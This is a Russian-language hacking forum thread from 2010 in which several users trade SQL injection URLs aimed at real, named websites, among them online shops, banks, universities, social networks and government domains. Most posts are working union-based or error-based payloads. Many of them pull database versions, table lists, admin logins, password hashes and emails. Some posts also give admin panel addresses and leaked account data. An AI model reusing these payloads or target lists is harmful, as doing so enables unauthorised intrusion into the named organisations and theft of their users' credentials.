Просмотр полной версии : SQL Инъекции
shell_c0de
18.08.2010, 03:40
ну ок продолжаем )
http://www.muskelzone.de/article.php?id=163'/*!limit+0+union+select+1,2,concat_ws(0x3a,admin_id ,admin_name,admin_email,admin_pass),4,5,6,7,8+from +shop_admin*/+--+!
%username% а ты будеш стоять и смотрать? )
http://www.stows.co.uk/index.php?_a=viewProd&productId=342+or+(1,1)=(select+count(0),concat((se lect+password+from+cc3CubeCart_admin_users+limit+0 ,1),floor(rand(0)*2))from(information_schema.table s)+group+by+2)--+
[Feldmarschall]
18.08.2010, 03:46
ну раз так, то продолжаем=), ну как бы круче шопа..
http://www.datenretter.de/aspprog/emamediaselection.asp?SEID=1'+or+1=(select top 1 table_name from information_schema.tables)--
Version:
Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
http://www.bernu-preces.lv/index.php?productID=588+or+(1,1)=(select+count(0), concat((select+version()+from+information_schema.t ables+limit+0,1),floor(rand(0)*2))from(information _schema.tables)+group+by+2)--+
shell_c0de
18.08.2010, 03:55
http://www.pharmasports.de/pharmasports/index.php?cat=16+and+row(1,2)in(seleCt%20Count(*), ConCat((seleCt+Count(*)+from+orders+limit+1),floor (rand(0)*2))as+a+from+orders+x+group+by+a)--&sort=&XTCsid=d5ack1mr1kcibkt7o0h0dun41tmqcebc&filter_id=26
path : /srv/www/htdocs/web2/html/pharmasports/
http://sadovod.net/index.php?productID=4281'+or+(1,1)=(select+count(0 ),concat((select+version()+from+information_schema .tables+limit+0,1),floor(rand(0)*2))from(informati on_schema.tables)+group+by+2)--+
[Feldmarschall]
18.08.2010, 04:11
шоп..
http://www.epier.com/l2.asp?catid=8082+or+1=(select top 1 table_name+from+information_schema.tables)
гдето 600-700 таблиц..
Version:
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4
http://www.cbperformance.com/catalog.asp?ProductID=1665+and+1=@@version
BrainDeaD
18.08.2010, 04:52
побалуюсь с вами
хз шоп или нет
Code:
http://www.olionatura.de/_rohstoffe/index.php?id=-62+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18+--
database:d0036ec4
version:5.0.51a-3ubuntu5.7-log
user:d0036ec4@127.0.0.1
[Feldmarschall]
18.08.2010, 04:52
шоп..
http://www.onelifeoutfitters.com/detail.cfm?ID=355297&storeid=78 and ascii(substring((database()),17,1))=115
будем до утра так сидеть(
http://550cord.com/products/info.asp?ProductID=7'+or+(1,1)=(select+count(0%20) ,concat((select+version()+from+information_schema. tables+limit+0,1),floor(rand(0)*2))from(informatio n_schema.tables)+group+by+2)--+
[Feldmarschall]
18.08.2010, 05:15
Шоп........
http://www.tabak-shop.ru/index.php?mod=showpodcat&podcatid=-14'+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10+and+'1'='1
КОПИИ ШВЕЙЦАРСКИХ ЧАСОВ
http://www.clockmarket.ru/catalog/index.php?brand_id=-8+and+1=2+union+select+1,concat_ws(0x3a,@@version, user(),database(),@@version_compile_os),3,4,5,6+--#80101
version : 5.0.51A-24+LENNY4
user : CLOCKMARKET@LOCALHOST
database : CLOCKMARKET
os : DEBIAN-LINUX-GNU
Code:
http://www.nigeriaff.com/Newsdisplay.php?ID=-181+union+select+1,concat_ws(0x3a,Username,Passwor d),3,4,5,6,7,8,9,10,11+from+userlogin+limit+1,1--+
http://vniisubtrop.ru/news.php?id=-14+union+select+1,2,concat_ws(user(),version()%20, database()),4,5,6,7,8+--+
www.luberec.ru/realty_ads.php?aid=-123+inion+select+1+--+
http://www.pushkino-online.ru/realty_ads.php?aid=-123+inion+select+1+--+
http://www.lobnya-online.ru/realty_ads.php?aid=-123+inion+select+1+--+
http://oz-gorod.ru/realty_ads.php?aid=-123+inion+select+1+--+
http://www.nasha-balashiha.ru/realty_ads.php?aid=-123+inion+select+1+--+
http://www.krasnogor.ru/realty_ads.php?aid=-123+inion+select+1+--+
http://www.gorodhimki.ru/realty_ads.php?aid=-123+inion+select+1+--+
http://www.gorodkorolev.ru/realty_ads.php?aid=-123+inion+select+1+--+
-PRIVAT-
18.08.2010, 19:23
http://www.unitedpurpose.org/archive/news.php?page=2&id=-86+union+select+1,2,3,version%28%29,5,6,7,8,9,0,1, 2,3%20+--+
PR 1
http://kpreps.com/Archive/news.php?id=-34+union+select+1,2,3,4,5,6,7,8,9,0--
PR 1
http://www.studiotranfaglia.it/old/news.php?id=-219+union+select+1,2,3,4,5,6,7,8,9,0,1%20--
PR 2 ТИЦ 10
http://www.mhs.ox.ac.uk/sis25/objects.php?id=-4+union+select+1,2,3,4,5,6+--+
PR 7 ТИЦ 50
[Feldmarschall]
18.08.2010, 20:28
https://www.regsoft.net/regsoft/vieworderpage.php3?productid=34083&ordertypeid=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),1 3,14
Classik+
18.08.2010, 20:55
http://metal-dekor.ru/index.php?option=com_simpleshop&task=browse&Itemid=30&catid=-1%20UNION%20SELECT%20user%28%29,concat%28username, 0x3a,password%29,user%28%29,user%28%29,user%28%29, user%28%29,user%28%29,user%28%29%20FROM%20jos_user s--
host6518@localhost
http://boldproxy.com/jump.php?id=-1+union+select+1,group_concat(table_name)+FROM+inf ormation_schema.tables+Where+table_schema=0x626F6C 6470726F787970746E6577--
соц-сеть забугорная
[Feldmarschall]
19.08.2010, 06:11
Bank of Bahrain[Bahrain Monetary Agency]
Code:
http://www.bma.gov.bh/page.php?p=-industry_newsletters'+union+select+1,concat_ws(0x3 a,version(),database(),user()),3,4,5,6+order+by+'1 '='1
-----
Ver: 5.1.47-community
db: cbb
usr: cbb@localhost
Раз пошли на такое, то...
North American Jewish Data Bank
http://www.jewishdatabank.org/study.asp?sid=18092+and+1=(select+top+1+table_name +from+information_schema.tables)
PR-7
[Feldmarschall]
19.08.2010, 07:07
ну раз так, то продолжаем )
Bank of Belize
Code:
http://www.centralbank.org.bz/dms20uc/dm_browse.asp?pid=convert(int,(select db_name()))
http://www.northcott.com.au/news.php?id=-109;select+cast(username||chr(58)||password%20as%2 0int),null,null,null,null,null,null,null+from+site s+limit+1+offset+1
http://www.railwayminsk.by/news.php?id=-248+union+select+1,2,group_concat(login,char(58),p assw),4+from+admins
http://www.peggyyihmd.com/news.php?id=-7+union+select+1,2,group_concat(user,char(58),pass word),4,5,6+from+mysql.user
http://runoffandrestructuring.com/news.php?id=432+and+1=9+/*!UnIoN+SeLeCt*/+1,group_concat(table_name),3+from+information_sch ema.%60tables%60+where+table_schema=database()
http://www.step-initiative.org/news.php?id=-0000000063+union+select+1,2,3,4,group_concat(usern ame,char(58),password),6,7,8,9,10,11,12,13,14,15,1 6,17,18,19+from+step_users
PR 2
Code:
http://www.egmemory.com/product.php?id=-111+union+select+1,concat_ws(0x2b,version(),user() ,@@version_compile_os)+--+
5.0.90 egmemory@localhost portbld-freebsd8.0
PR 5
Code:
http://www.schlup.net/usb/devices/showdescr.php?id=-4194+UnIon+SeLeCT+concat_ws(0x2b,version(),user(), @@version_compile_os),2,3,4,5+--+
5.1.31+nobody@localhost+pc-linux-gnu
-PRIVAT-
19.08.2010, 11:57
http://www.gs13.ru/modules/teachers/teacher.php?id=-5+union+select+1,2,3,4,5+--+
ТИЦ 20
http://tutioninformation.com/teacher.php?id=-11+union+select+1,2,3,4,5,6,7,8,9%20--
http://viprepetitor.ru/teacher.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3%20--
http://hexin.fudan.edu.cn/hexin/teacher.php?id=-30437+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1,2%20--
http://www.artichokemusic.com/teacher.php?id=-30+union+select+1,version%28%29,3,4,5,6,7,8,9,0,1, 2,3%20--
ТИЦ 10 PR 4
http://www.artifok.com/teacher.php?id=-105+union+select+1,version%28%29,3,4,5,6,7,8,9,0,1 ,2,3%20--
PR 2
http://www.edsa.hk/v2/teacher.php?id=-3+union+select+1,2,3,4,5,6--
PR 3
http://www.smcstn.org/current-students/teacher.php?id=-24+union+select+1,2,3,4,5,6,7--
PR 3
http://forest.ob-i.com/en/teacher.php?id=-21+union+select+1,2,3,4,5,6,7,8,9%20--
PR 6
Code:
http://cloudytags.com/index.php?idlink=-1+UNION+SELECT+1,%20concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18&Section=linkdetails
70к юзеров
продолжаем бомбить забугорные соц-сети =)
Code:
http://elanforum.com/search.php?search=advice&tag=true&from=1+or+%28select+count%28*%29+from+%28select+1+ union+select+2+union+select+3+union+select+4+union +select+5%29x+group+by+concat%28user%28%29,floor%2 8rand%280%29*2%29%29%29+--+
еще соц-сеть забугорная
Code:
http://www.thepalladiumdubai.com/events-details.php?id=-48+union+select+1,2,3,4,5,6,concat_ws%280x3a,user_ login,user_pass,user_email%29,8,9,10,11,12,13,14,1 5,16,17,18,19,20+from+pm_users--+
Code:
http://invest-market.kz/deposit/bank.php?id=-null+union+select+concat_ws(0x3a,version(),user(), database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19--
Code:
http://www.apsira.com/loans/bank.php?bankId=-null+union+select+2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9,10,11,12--
какие-то банки
Code:
http://www.gabbr.com/treadhottopic.php?id=-13298+union+select+version()&topicTitle=Angelina&topicQuestion=Salt
соц-сеть,с кармадрочерами.
конки помог=*
создание и продвижение интернет-сайтов
ARTCREDO
http://www.artcredo.ru/article.php?id=-9+and+1=2+union+select+1,concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os),3,4+--
version : 4.1.20-log
user : itbrains@localhost
database : itbrains
os : pc-linux-gnu
Code:
http://www.antiddos.biz/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,p assword),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+j os_users--
х.з. можно ли выкладывать полностью расскуренную скуль, ну рискну
тИЦ — 50
PR — 2
Code:
http://www.vip-tur.ru/?page=country&id=-49+union+select+1,concat_ws%280x3a,Login,pwd%29,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43+from+linksviptur_admin--+
http://www.ibiblio.org/mpact/mpact.php?op=show_graph&id=7967+union+select+1,2,3,concat_ws(0x3a,user(),v ersion(),database(),username,password),5,6+from+us ers--
http://www.ils.unc.edu/mpact/mpact.php?op=show_graph&id=7967+union+select+1,2,3,user(),5,6--
http://www.ecprov.gov.za PR-7
http://www.ecprov.gov.za/index.php?module=documents&category=-3+union+select+1,concat(user,char(58),password),3+ from+mysql.user--
user() : root
file_priv =Y
http://www.ecprov.gov.za/index.php?module=documents&category=-3+union+select+1,group_concat(username,char(58),pa ssword),3+from+mod_users--
http://www.ecprov.gov.za/tools/
[Feldmarschall]
20.08.2010, 03:20
Code:
http://www.stylussofas.com/stylegallery.php?categoryid=-1'+union+select+1,concat(version(),database(),user ()),3,4,5,6,7,8,9,10,11,12,13,14,15+order+by+'1'=' 1
шоп.
Code:
http://www.kimallansilk.com/productdetail.php?proid=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11--
продолжим по турагенствам
тИЦ — 20
PR — 3
Code:
http://www.ugtour.ru/?query=menu&i=1&s=-274+union+select+1,2,3,user(),5+--+
ugtour@localhost
Яндекс тИЦ 10
Google PageRank 2/10
http://www.n-oil.by/lubrication/newz.php?id=-2+union+select+concat_ws(user(),database()),2,3+--+
--------------------------------------------------------
Google PageRank 1/10
http://www.nutritionalinsider.com/newz.php?id=-17+union+select+1,user(),3,4,5,6,7+--+
админка:
http://www.nutritionalinsider.com/admin/
----------------------------------------------------
Какой-то шоп, не раскрутить:
http://www.shopert.com/blog.php?id=-43+group+by+2+--+
Lilo said:
Подхватываю ставку друг
Kusto
Code:
http://www.arctic-adventure.dk/tour.php?id=-38+union+select+1,2,3,version(),5,6,7,8,9,10,11,12
продолжим
тИЦ — 120
PR — 4
Code:
http://www.vsktour.ru/index.php?pageid=-3+union+select+user()+--+
vsktour@zvm4.host.ru
Kusto said:
продолжим
Code:
http://www.railtrail.co.uk/tour.php?id=-91+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64,65--
замучился подбирать =(
4.1.20:site:siteadmin@localhost:redhat-linux-gnu
PR -3
http://www.dzz.gov.ua
http://www.dzz.gov.ua/CPOSI/style/page_2/templer_page2_ua.php?id=-2+union+select+1,2,version(),4,5,6,7,8+from+inform ation_schema.tables&table=info
да и не хотел ломать далше...
http://www.upperuwchlan-pa.gov/newsfull.php?id=-110+union+select+1,group_concat(0x0b,id,0x3a,usern ame,0x3a,password),3,4,5,6,7,8+from+admin+--
PR 4
panel:
Code:
http://www.upperuwchlan-pa.gov/cpanel/
http://www.sitsantacruz.gov.ar
http://www.sitsantacruz.gov.ar/iniciog.php?opcion=bb01-01&id=-7+union+select+1,2,group_concat(user,char(58),pass 1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+fr om+subse_seguridad.usuarios
.:[melkiy]:.
20.08.2010, 05:10
PR 5
Code:
http://www.socialistreview.org.uk/article.php?articlenumber=-11176+union+select+1,2,3,4,5,6,7,8,9,10,11,12,conc at_ws(0x3a,name,password),14,15,16,17,18,19,20,22+ from+auth+limit+5,1
http://www.ezhouinvest.gov.cn
http://www.ezhouinvest.gov.cn/webezzs/info.php?rid=-337+union+select+1,2,3,4,5,group_concat(LoginName, char(58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26+from+ezzs_admin_user
http://www.ezhouinvest.gov.cn/webezzs/admin
http://www.partner.dn.ua/p.php?n=-64+union+select+1,concat_ws(user(),version()%20,da tabase()),3,4+--+
user uh105674_bot@nvh122.mirohost.net
version 5.0.91
database uh105674_bot
тиц 325 Яндекс Rank 4/6 Google PageRank 2/10
-PRIVAT-
20.08.2010, 11:59
http://tutioninformation.com/teacher.php?id=-11+union+select+1,2,3,4,5,6,7,8,9%20--
Ну давайте продолжать бомбить турагенства, и социальные сети!
http://www.vostok.cc/tourpage.php?id=-10+union+select+1,2,3%20--
Vostok Travel! PageRank 2
http://www.baseballprospectus.com/article.php?articleid=-878+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,group _concat(table_name),6,7,8,9,0,1,2+from+information _schema.tables+--+
PR 6
http://www.emanuellevy.com/search/details.cfm?id=-5612+union+select+group_concat(table_NaME),2,3,4,5 ,67,8,9,1+from+information_schema.tables --
PR 4
http://www.lifeyoga.com.hk/eng/teacher.php?id=-4+union+select+1,2,3,4,5,67,8,9,0--
PR 3
туристическая компания CITTOURS
http://cittours.ca/tour.php?id=-76+union+select+1,2,3,4,5,concat(host,char(58),use r,char(58),password),7,8+from+mysql.user&info=hotels
Code:
http://www.hotel.is/hotel.php?id=-116+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (0x3a,version(),database(),user(),@@version_compil e_os),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38--
тиц-10
pr-4
не турфирма,но тоже не плохо, отель какой-то =)
http://russianagent.com/showTour.php?tour=26+and+1=0+union+select+1,2,3,4, 5,group_concat(table_name),7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+f rom+information_schema.tables+where+table_schema=d atabase()
Code:
http://www.govtube.ps/slider.php?cat=1+and+1=0+Union%20Select+1,2,3,conc at_ws%280x3a,username,email,level%29,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36+from+users--+
gcctube:ijalanbo@gov.ps:Admin
Code:
http://www.govtube.ps/admin_area/login.php
PR:5
moodoone
20.08.2010, 18:01
Code:
http://www.edwar.ru/section.php?id=-35+UnIon+selECt+1,group_concat(table_name),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17+from+information_sc hema.tables--+
ТИЦ: 30
PR: 4
Code:
http://abrionline.org/player.php?id=-58+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),database(),user(),@@version_compile_os)%20% 20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38--
PR-5
Code:
http://www.lycheetube.com/videos/player.php?id=-938021+union+select+1,table_name,3,4,5,6+from+info rmation_schema.tables%20--
гнуха
Code:
http://www.annaghunited.co.uk/player.php?id=-13+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),5,6,7,8,9,10, 11,12--
какой-то футбольный клуб
PR 2
Code:
http://www.fulltubemovies.com/videos/player.php?id=-52575+union+select+1,2,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),4,5,6--&from=c
опять гнуха
.:[melkiy]:.
20.08.2010, 18:59
шоп
Code:
http://www.spoonsports.co.uk/product.php?make=HONDA&model=&type=&level1=EXTERIOR+STYLING&level2=&level3=&id=-2990+union+select+1,2,count(*),4,5,6,7,concat_ws(0 x3a,version(),user(),database()),9,10+from+informa tion_schema.tables
на чем мы там на турагенствах остановились? ОК
тИЦ — 230
PR — 4
Code:
http://www.amigo-tours.ru/czechia_ru/firms/index.html?id=-56+union+select+1,concat_ws(0x3a,version(),user(), database())+--+
Code:
http://www.flatart.ru/base.php?id=-12+union+select+1,2,3,user()+--+
P.S. Вашу игру с доменами в зоне gov я не буду поддерживать извиняйте
Тур агентство и что то похожее..
Code:
http://www.trevelone.ru/hotel.php?id=367+or+(select+count(*)from(select+1+ union+select+2+union+select+3)x+group+by+concat(mi d((select+concat_ws(0x3a,username,0x3a,password)+f rom+lore_users+limit+0,1),1,64),floor(rand(0)*2)))--
http://www.belarus-tour.com/lib/detail.php?cat=1&rub=2&id=-2847+union+select+1,2,3,4,group_concat(username,ch ar(58),passwd),6,7,8,9,10,11,12,13,14+from+bank_us er
Новейшие научные технологии в медицине
Веллнесс трейдинг
http://www.wellnesstrading.ru/content.php?id=2&cid=-20+and+1=2+union+select+1,concat_ws(char(58),@@ver sion,user(),database(),@@version_compile_os),3,4,5 +--
version : Debian_7etch12
user : vellness@localhost
database : vls_bs
os : pc-linux-gnu
-PRIVAT-
20.08.2010, 22:51
http://www.gome.com.hk/insidepage.php?act=soa&id=-814+union+select+1,2,3,group_concat%28table_name%2 9,5,6,7,8,9,0,1,2,3,4+from+information_schema.tabl es%20--
PR 4 ТИЦ 10
http://www.arihant.com/insidepage.php?catid=-295+union+select+1,2,3,4%20--
PR 3 ТИЦ 10
http://www.drramanbjp.org/hindi/insidepage.php?catid=-70+union+select+1,2,3,4+--+
PR 1
http://ess.ustc.edu.cn/teacher.php?id=-14+union+select+1,concat,3,4,5,6,7,8,9,0,1,2,3+fro m+--#jump_
PR 8 ТИЦ 50
http://training2.cyol.com/expert/teacher.php?id=302+union+sleect+1,2,3,4,5,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20--
PR 8 ТИЦ 10
http://www.volanbusz.hu/travel.php?id=-30+union+select+1,2,group_concat%28table_name%29,4 ,5,6,7,8,9+from+information_schema.tables%20--
PR 6
http://www.airsouthwest.com/travel.php?id=-35+union+select+1,concat_ws%28password%29,3,4,5,6, 7,8,9,0,1,2+from+user%20+--+
PR 6 ТИЦ 20
домен китайский но на нем какойто арабский сайт- думаю по нашей тематике - путешествий и туров
Code:
http://www.uqur.cn/tur.php?tur=9+and+1=0+union+select+1,concat_ws%280 x3a,ner_name,ner_pass%29+from+ner_admin+--+
http://www.audioport.eu/index.php?productID=1765'or+(1,1)=(select+count(0) ,concat((select+concat_ws(0x3a,U_ID,u_password)+fr om+WBS_USER+limit+1,1),floor(rand(0)*2))from(infor mation_schema.tables)+group+by+2)--+
Продолжим тему туризма
вывел все таблы но пользователей и админа не нашол
Code:
http://www.yeniatilim.com/yurtici-tur.php?git=listele&id=-46+union+select+1,2,3,4,5,6,7,user(),DATABASE(),VE RSION(),11,12,13,14,15,16,17,18,19+--+
atilim_atilim@localhost
atilim_db
5.0.91-community-log
кидаю еще одну раскуренную скуль (Конки- не ругайся ) Что то там с африкой связанно- суданский чтоли сайт,
Code:
http://www.sudanvotes.com/topics/index-ar.php?id=7+and+1=0+union+select+1,2,3,concat_ws%2 80x3a,username,password%29,5+from+admins+--+
http://www.kartalram.gov.tr
http://www.kartalram.gov.tr/?p=galeri&id=-12+union+select+1,2,group_concat(table_name)+from+ information_schema.tables+where+table_schema=datab ase()--
калонка 3 - href картинки
http://www.columbuscomets.com/player.php?id=-52+union+select
Code:
+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database (),user(),@@version_compile_os),10,11,12,13--
хокей,что то там.
Code:
http://www.extrapost.com/videos/player.php?id=-35727+union+select+1,COLUMN_NAME,3,4,5,6+from+INFO RMATION_SCHEMA.COLUMNS--&from=c
гнуха
http://www.hotelvillazurich.com/index.phtml?id=-4000+union+select+1,2,3,4,5,6,7,8,9
http://www.ezosunalcocukatolyesi.com/index.phtml?id=-20000+union+select+1,2,version(),4,5,6,7,8,9
http://www.cografyasaati.com/index.phtml?id=-140000+union+select+1,version(),3,4,5--
http://www.artima.com.tr/index.phtml?dil=1&id=-40+union+select+1,2,version(),4,5,6,7&gid=3&rid=638
http://www.digicag.com.tr/index.phtml?id=-214000+union+select+1,version(),3,4,5
Code:
http://www.saucony.kiev.ua/sport.php?id=-6+union+select+1,2,TABLE_NAME,4,5,6,7,8,9++from+IN FORMATION_SCHEMA.TABLES--
moodoone
21.08.2010, 15:55
Code:
http://results.orienteeringsport.com/participant.php?id=-1559+union+select+1,2,version()--
Code:
http://www.networkandgetwork.com/participant.php?id=-97+UnIon+selECt+1,2,database(),user(),version(),6, 7,8,9,10,11,12,13,14,15--
Code:
http://equal.ccbcnes.org/content/participant.php?id=-2+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12+--+
Code:
http://www.firagirona.com/participant.php?id=118&cl=-100005+UnIon+selECt+1,2,3,4,5,6,7,8,version(),10,1 1,12--
Code:
http://www.elysee.ru/showimg.php?id=-245+UnIon+selECt+1,2,3,4,5,6,7,8,9,group_concat(ta ble_name)+from+information_schema.tables--+
Code:
http://www.8op10.be/showimg.php?id=-68+UnIon+selECt+1,2,3,4,5+--+
Code:
http://www.pikipoika.ru/news.php?action=news&id=-14+union+select+1,2,3,table_name,5,6+from+informat ion_schema.tables+limit+1,1--
Code:
http://avtoram.com/index.php?action=news&id=-1+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),3,4--
Code:
http://www.posttypography.com/site/index.php?action=news&id=-796+union+select+1,2,concat(version(),0x3a,user(), 0x3a,database()),4--
-PRIVAT-
21.08.2010, 16:22
http://www.csie.chu.edu.tw/2003/content.php?nid=-43+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0--
PR 7 ТИЦ 10
http://eeweb.hit.edu.tw/teacher/teacher.php?id=-27+union+select+1,2,3,4,5,6,7,8,9,0,group_concat%2 8table_name%29,2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+in formation_schmea.tables--
PR 6 ТИЦ 10
http://ess.ustc.edu.cn/teacher.php?id=-14+union+select+1,concat_ws%280x3a,id,username,pas sword,usertype%29,3,4,5,6,7,8,9,0,1,2,3+from+db_us er--#jump_
PR 8 ТИЦ 50
http://www.starswelove.com/scriptsphp/news.php?newsid=-6431+union+select+1,group_concat%28table_name%29,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+information_sche ma.tables%20--
PR 4 ТИЦ 20
http://www.russell-watson.com/news.php?newsID=-18+union+select+1,2,3,4,version%28%29,concat%28@i: =0x00,@o:=0x0d0a,benchmark%28141,@o:=CONCAT%28@o,0 x0d0a,%28SELECT+concat%28table_schema,0x2E,@i:=tab le_name%29+from+FROM+information_schema.tables+WHE RE+table_name%3E@i+order+by+table_name+LIMIT%201%2 9%29%29,@o%29%20--
PR 5 ТИЦ 10
http://www.digitalproductionbuzz.com/news.php?newsid=-1668+union+select+1,2,3,4,5,6,7,8,9 --
PR 6
Code:
http://ufa.prepod.org/vote.php?id=-3468+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49.50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,71,72,73,74,75,76,77,78,79,8 0--
ТИЦ-20
сайт о преподах=)
winstrool
21.08.2010, 17:09
ТИЦ 10 PR 1
_http://www.domoteka.org/lot_kv.php?vid=kv1&id=111+union+select+1,2,3,4,5,6,7,8,9,0,11,version (),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,concat_ws(0x3a,name,pass)+from+users--
moodoone
21.08.2010, 21:56
Code:
http://www.ultratune.com.au/compview.php?id=-666+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20--
http://www.ultratune.com.au/admin/admin.php
http://archee.qc.ca/ar.php?page=article&no=-344+union+select+1,2,3,4,5,6,7,8,9,user(),11,12,13 ,14,15,16,version(),database(),19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33+--+
http://www.quieromiautoya.com.ar/php/subweb/index.php?id=4+and+1=0+union+select+1,2+--+
http://www.burrowsluongo.com/type.php?id=-11+union+select+1,user()+--+
http://www.recipe.ru/docs/nd/type.php?id=-6+union+select+1,user()+--+
теперь по теме туров, кидаю раскуренную скуль, здесь специально вывел 3-его юзера чтоб вы оценили юмор админа
Code:
http://www.rtk-ust.ru/type.php?id=-6+union+select+concat_ws(0x3a,user,pass),2,3,4+fro m+users+LIMIT+2,1%20+--+
результат faster:заебись пароль
переведите в кодировку UTF-8 оцените весь юмор админов
а вот так можно и не переводить
http://www.rtk-ust.ru/type.php?id=-6+union+select+concat_ws(0x3a,user,pass),2,3,4+fro m+users+LIMIT+3,2%20+--+
Code:
http://www.saucony.kiev.ua/sport.php?id=-6+union+select+1,2,TABLE_NAME,4,5,6,7,8,9++from+IN FORMATION_SCHEMA.TABLES--
Code:
http://www.starswelove.com/scriptsphp/news.php?newsid=-6431+union+select+1,group_concat%28table_name%29,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+information_sche ma.tables%20-
Code:
http://www.combineport.hut2.ru/nasm/mod.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user(),@@version_compile_os)%20%20,2--
Code:
http://driverb.ru/mod.php?id=-1735+union+select+1,2,3,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os)--
Code:
http://www.mksm-kmz.ru/catalog/menu.php?id=-11+union+select+null,null,null,null,null,null,null ,null--
Code:
http://www.biletda.ru/best.php?id=-188+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15-
Code:
http://www.teatrum.ru/best.php?id=-102+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13--
Code:
http://www.unlocknews.eu/box.php?id=-78+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,database(),user(),@@version_compile_os)%20%20,7,8--
Code:
http://www.set-radio.ru/radio.php?id=1+union+select+1,concat_ws(0x3a,versi on(),database(),user(),@@version_compile_os),3,4,5 ,6,7--
Code:
http://www.mrcmodelisme.com/fiche_radio.php?id=-23+union+select+1,version(),3--
Code:
http://www.mobile.tomsk.ru/phone.php?id=-37+union+select+1,2,3,%20%20concat_ws(0x3a,version (),database(),user(),@@version_compile_os),5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30--
Code:
http://reales.tonosgratis.com.mx/descarga-tono-real.php?id=-8+union+select+1,2,version()--
Code:
http://www.termoklimat.ru/news.php?id=-377+union+select+1,2,3,version(),5,6+--+
Code:
http://www.artgamma.ru/news.php?id=-45+union+select+1,2,3,4,5,6,7,8,9,10,12,13,14,15,1 6--++
*uNkN0Wn*
22.08.2010, 02:18
PR - 5
http://www.cplmedia.org/story.php?story=-1272+union+select+1,2,group_concat(email,char(58)) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+tvpol l1--
Code:
http://meteoinfo.by/news/?page=-23618+union+select+1,concat_ws(char(58),version(), user(),database(),@@version_compile_os),3,4,5,6--+
Version: 5.0.27-log
User: guest@localhost
Database: www
Os: redhat-linux-gnu
PR - 4
тИЦ - 100
Code:
http://www.velotaxi.de/php/main.php?id=\'1&lang=\'en
velotaxidb@web1.dfberlin.de:5.0.32-Debian_7etch12-log:velotaxidb
тИЦ 10
PR 4
Code:
http://equineexplorer.com/sport.php?id=42+union+select+user()--+
остальное не стал выводить
equine_equ1n3u@localhost:4.1.20-standard-log:equine_equ1n3db
PR 3
Code:
